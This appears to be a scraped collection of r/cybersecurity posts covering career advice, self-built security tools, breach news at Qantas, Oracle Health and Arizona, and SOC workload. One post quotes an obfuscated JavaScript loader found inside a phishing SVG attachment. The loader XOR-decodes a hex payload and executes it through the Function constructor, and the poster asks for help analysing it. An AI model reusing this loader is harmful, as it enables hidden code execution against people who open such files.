cybersecurity

The original post: /r/cybersecurity by /u/Brown_jamun on 2025-07-02 14:19:10.

I have been working for the past 4 years in SOC-Azure, using Sentinel and Microsoft Defender for Endpoint (MDE) in my daily tasks. However, after speaking with my senior, I’ve realized that the scope is limited in cloud security.

I’m planning to transition into a different domain—preferably Red Team or another cutting-edge area that keeps me within the cybersecurity field, but in a more lucrative and interesting role. My priority is to enjoy the work I do. SOC work is very repetitive and shift-based. While I’m okay with working night shifts, the constant rotation is impacting my health and doesn’t seem sustainable in the long term.

What roles should I consider next? What technologies should I learn to make this switch into a more exciting role? A clear pathway would be very helpful.

I’m based in India. My current company feels like a dream job in terms of WFH flexibility and free time—but I’m no longer interested in the work. The pay is just enough to cover my bills.

Any suggestions from experienced folks? Should I stay in SOC but change my domain? If so, what should be my next course of action? Thanks again for reading this.

The original post: /r/cybersecurity by /u/Big-Salamander-1522 on 2025-07-02 13:42:52.

Hey everyone — over the last 2 weeks I’ve built and published 3 security-focused tools:

• Cryptography CLI toolkit (AES, RSA, SHA256)
• Cybersecurity GUI tools (logging, hashing, encoding)
• Web App Pentesting Walkthrough Pack (XSS, SQLi, CSRF, IDOR, etc.)

All are open source and now public at: github.com/Zerokeylabs

They’ve gotten 1,000+ views in 15 hours across Reddit subs and 48+ GitHub clones.

🧠 I’m now looking to:

• Connect with other indie security builders or engineers
• Join a Discord server where people share ideas, tools, or even pay to build secure stuff

I don’t want to cold-DM anyone or post in the wrong place, so if anyone knows where good discussions or collabs happen, I’d truly appreciate the direction.

Happy to return feedback or contribute to anything in the open.

Cheers 🙌

Update: This post just hit 482+ views in 1 hour, with majority from the US & UK — and it’s now marked “#1 of all time” on my Reddit by insights.

Still looking for Discords with founders or builders where security tools get shared/tested.

I build crypto, pentesting, and cybersec tools. Happy to contribute or help in return.

🔄 Small milestone update: Crossed 1,200+ views and 500+ US viewers on this post.

Appreciate everyone who checked out the tools — if you're building something in crypto, SaaS, or security and want help reviewing or securing it, I'm open to collabs. Grateful for the interest - didn’t expect this much visibility in such a short time.

You can find the tools here: https://github.com/Zerokeylabs

The original post: /r/cybersecurity by /u/Desperate_Bath7342 on 2025-07-02 13:40:39.

I have decent experience in DAST and whitebox security testing, now I am switching to learn SAST, what's the coding experience expectations to excel in SAST, I had good exposure in coding in college and some small projects, but no real experience in professional journey.

The original post: /r/cybersecurity by /u/Desperate_Bath7342 on 2025-07-02 13:30:41.

In my appsec journey, I have switched to a role which just involves retest/rescan of issues reported during SAST/DAST unlike full blown whitebox sec testing I have always done in my career. How can I circumvent this hindrance in my career? I don't have access to much tools apart from veracode, appscan.

The original post: /r/cybersecurity by /u/Fluffy_White_Bunny on 2025-07-02 13:23:13.

Recently my inbox has suspicious emails containing SVG files and contain no texts at all. I managed to open the file and view its code in notepad. I can only guess it’s malicious, but can anyone figure out what does the code below do?

S = 'xxxxxx'; (() => { const i = "bdd65fd0865d8e48898806a4", j = "150d0a525a114a5c57555410510a5a16504b5d5e100b4155160b061e55072c62581d12545b2d13131a740e74121d434d5a1d461d55043057581d12505a571313585a4d62501d015a340e041d123f09091f1d121174081313586f4274501d46042452431d55373254581d5529593254131a77086e121d46042055431d552b1e7e581d122b620c13131a01531a191d320f"; const u = j.match(/.{2}/g), T = []; for (let B = 0; B < u.length; B++) { T.push(String.fromCharCode(parseInt(u[B], 16) ^ i.charCodeAt(B % i.length))); } const s = T.join(''); const A = { toString: () => { const r = [][ [115,111,109,101].map(y => String.fromCharCode(y)).join('') ][ [99,111,110,115,116,114,117,99,116,111,114].map(y => String.fromCharCode(y)).join('') ]; return r(s)(), 1; } }; A + ''; })(); ]]>

The original post: /r/cybersecurity by /u/BedNo8883 on 2025-07-02 12:02:10.

Let me add some context to this.

We have a disastrous remote work policy that pretty much allows any user to work any where, with the only caveat being if they travel internationally they can’t be there for more than 30 days.

So, it came down from above that if users travel internationally they have to submit a ticket to the SOC so that we can notate their travel. We started doing this because we’d see sign-in activity and then reach out to a manager to see if they were supposed to be there.

This has become…overwhelming…. We now get 100s of travel tickets a month…

I have to go through these and document every person and then refer back to it if I see sign-in logs for them. If I don’t it’s an email to the manager.

I’m trying to work with my team to automate this but it’s been slow going.

Where I’m at is my first SOC job and I’m not sure if this is normal or completely bonkers.

The original post: /r/cybersecurity by /u/Excellent_Analysis65 on 2025-07-02 11:47:03.

The original post: /r/cybersecurity by /u/im_guru on 2025-07-02 10:33:51.

The original post: /r/cybersecurity by /u/Defiant_Variety4453 on 2025-07-02 09:38:37.

Could you guys recommend adequate learning materials for junior cyber security engineers? My personal request would be focused on Azure. Thank you.

The original post: /r/cybersecurity by /u/Mindless_Pension_786 on 2025-07-02 08:16:21.

Hi

I have created a password generator tool that is customizeable and does not save any personal details - it is not meant to assist in retrieving your password but generating a strong one. Possible addition of local storage but use case for shared pc is not adviseable

https://passfader.com/

The original post: /r/cybersecurity by /u/NickyK01 on 2025-07-02 07:59:32.

This is a pretty big challenge for a lot of organizations, including ours. Scams these days are getting incredibly sophisticated, way beyond just obvious phishing emails with typos. Attackers are using really clever social engineering tactics, making it super hard for anyone, especially non-technical staff, to tell what's legitimate and what's not. They're often the first point of contact for these things, which puts a huge amount of pressure on them and on our security.

We run training, of course, but it sometimes feels like we're always playing catch-up, and it's tough to make the material truly stick and be effective against constantly evolving threats. What methods or approaches have you found genuinely work to empower your non-technical teams to spot those subtle, high-level scams before they become a problem? Thanks for any ideas!

The original post: /r/cybersecurity by /u/Narrow-Sir300 on 2025-07-02 06:56:57.

Hi! I am experienced InfoSec specialist with senior roles in saas leading companies, and big4 and so on. Over 7 years on the field, holding good experience and certifications such as CISM, ISO27001 LA-LI, NIS2 Mgmt, ISO22301 LA, experience with GRC, Audits, Sec Awareness, XDR tools and Cloud security mainly Azure (entraID, Purview)

I am not talking Danish, so I will seek more for international companies…

So, what can i expect? In terms of salaries:

• dkk gross salary and net after taxes.. because I saw some controversia and i’d to hear your feedback.

Txs ❤️🫡

The original post: /r/cybersecurity by /u/OutrageousComputer63 on 2025-07-01 22:56:58.

Hey everyone, I’m a web developer and have been working on this website that allows website owners to put there url into the website and check the website for vulnerabilities, I’m making sure no one can abuse this website by making website owners include a meta tag into there code with a random code to make sure they own the website, I am also limiting one scan per hour for each ip address to prevent further abuse, what do you think of this idea, would you pay to use it/is it even practical? Please give me any feedback as I don’t have a huge background in cyber security and want to make sure I’m making the website as secure and safe as possible.

The original post: /r/cybersecurity by /u/OkShare735 on 2025-07-01 20:32:07.

Hey all,

So I got tired of doing the usual recon dance: Subfinder → httpx → ports → screenshots → Nuclei → copy-paste results manually.

I ended up building a small tool for myself that just takes a domain, enumerates subdomains, checks open ports, fingerprints tech, takes screenshots, and gives me a JSON and HTML report.

I'm still improving it, but it's already saving me time when doing quick bug bounty sweeps or external pentests.

Here’s a sample output:

• 12 subdomains found

• 8 active web services

• Tech stack: Nginx, WordPress, PHP 8.1

• Some missing headers / info disclosures flagged

• Screenshots auto-captured

• Final report: JSON + HTML, sorted by subdomain → service → tech → potential vuln

I'm not here to promo anything — just wondering:

• Would this help in your recon workflow?

• Or is this kind of automation already overdone?

• Anything you’d want *added* that would actually make this valuable?

Happy to share the repo if anyone’s curious — just trying not to trigger automods by linking directly.

Cheers.

The original post: /r/cybersecurity by /u/Legal-Zi on 2025-07-01 20:29:17.

Hi everyone 👋 I’m a law student at Jamia Millia Islamia, currently working on a research project exploring how women in South-East Delhi are affected by cybercrimes—from online harassment and blackmail to identity theft and stalking.

To better understand this issue, I’m looking to speak with: 🔹 Women who have faced online abuse (you can stay completely anonymous) 🔹 Lawyers, NGO workers, social workers, or journalists who have worked on such cases 🔹 Anyone who can share real-life insights or connect me with someone relevant

Your story or expertise can genuinely help raise awareness and push for better legal protections. Even a small lead or quick chat would mean a lot.

➡️ If you're open to helping—or know someone who might be—please DM me. Everything will be handled with complete sensitivity and confidentiality.

Thanks in advance for your support 🙏

The original post: /r/cybersecurity by /u/nawafaljahdal1 on 2025-07-01 19:55:27.

Hello everyone,

I'm currently going through the Boss of the SOC (BOTS) challenges on CyberDefenders.org, and I’m looking for any available write-ups, detection strategies, or Splunk queries related to the following versions:

• Boss of the SOC v1
• Boss of the SOC v2
• Boss of the SOC v3

These challenges are a great way to improve skills in:

• Threat Hunting

• Log Analysis

• Incident Response

• Detection Engineering

• SIEM Operations (especially Splunk)

If you’ve published or know of any:

• GitHub repos with notes or queries

• Blog posts with explanations

• Detection rules or dashboard setups

• Lessons learned or tips per question

Please share them here!

Let’s make this post a reference hub for anyone tackling these labs and trying to build their Blue Team skills.

Thanks in advance, and happy hunting 🕵️‍♂️🔍

Keywords:

Splunk | Boss of the SOC | CyberDefenders | SOC Analyst | Threat Detection | Blue Team | SIEM | Write-Ups | Detection Engineering | Log Analysis | Incident Response

The original post: /r/cybersecurity by /u/Substantial-Fox1577 on 2025-07-01 19:41:31.

Hey everyone,

I'm planning to transition into cybersecurity freelancing over the next 1–2 years and eventually run my own thing. I've got 15+ years of experience across different areas of cyber, including Red Teaming, Incident Response, GRC, CISO advisory, and Security Operations.

As I prepare for this move, I’d love to hear from others who’ve taken the freelancing route:

• Which cybersecurity roles or skill sets are in the highest demand for freelancers?
• Which ones tend to pay better or offer more steady project work?
• Are there specific niches or certifications that help land clients more easily (especially internationally)? I already have the common ones - CISSP, CISM, CISA, OSCP, GPEN, GCFA, GCIH

I’m open to focusing more on one area if it gives me a better shot at being successful on my own. Curious to hear what’s working for others out there, your advice, experiences, or even lessons learned.

Thanks in advance!

The original post: /r/cybersecurity by /u/baty0man_ on 2025-07-02 04:18:50.

The original post: /r/cybersecurity by /u/Any-Opposite-241 on 2025-07-02 01:59:46.

Hey everyone. I just passed sec+ last week and was thinking what to get next. My ultimate goal is to get oscp and be on the red team. I was thinking ejpt-> ceh-> oscp? My background is in software development. Been doing it for 5 years now. Any advice would be greatly appreciated

The original post: /r/cybersecurity by /u/CatfishEnchiladas on 2025-07-02 01:29:34.

The Arizona Secretary of State's Office reported a temporary outage of its Candidate Portal due to a detected cyberattack, although the statewide voter registration database remained unharmed. Secretary of State Adrian Fontes emphasized the growing threats to election infrastructure and commended the state's cybersecurity teams for their prompt actions while ensuring candidates could still file necessary documents.

The original post: /r/cybersecurity by /u/cybersecurity on 2025-07-02 01:17:24.

The original post: /r/cybersecurity by /u/MichaelSanders19 on 2025-07-02 00:42:14.

Qantas Airlines has been breached in a cyber incident disclosed on their website. Interesting timing considering the FBI announcement on Scatterred Spider targeting airlines.

The original post: /r/cybersecurity by /u/gdnwsrex on 2025-07-01 23:58:42.

Welcome to r/SaaSDevHub, the community for all things tech and SaaS!

✅ Are you a developer, designer, product manager, founder, or tech enthusiast? This is your hub.

✅ Share what you’re building.

✅ Discuss tech stacks, APIs, scaling challenges, and best practices.

✅ Find collaborators, cofounders, or feedback.

✅ Learn from others in the SaaS and tech space.

Choose your user flair to showcase your role. Let’s build better SaaS together.

The original post: /r/cybersecurity by /u/Smooth-Breadfruit362 on 2025-07-01 23:24:57.

Mosaic joins TMH and Union Health. Oracle has yet to disclose how attacker obtained credentials to access PHI for "many health care organizations nationwide..." https://www.beckershospitalreview.com/healthcare-information-technology/ehrs/oracle-health-data-breach-affects-missouri-health-system/

The original post: /r/cybersecurity by /u/causeimcloudy on 2025-07-01 21:47:03.

I am looking for some ideas of other things to automate in my Org and I would love to get an idea of what tasks other people wish were automated but are not.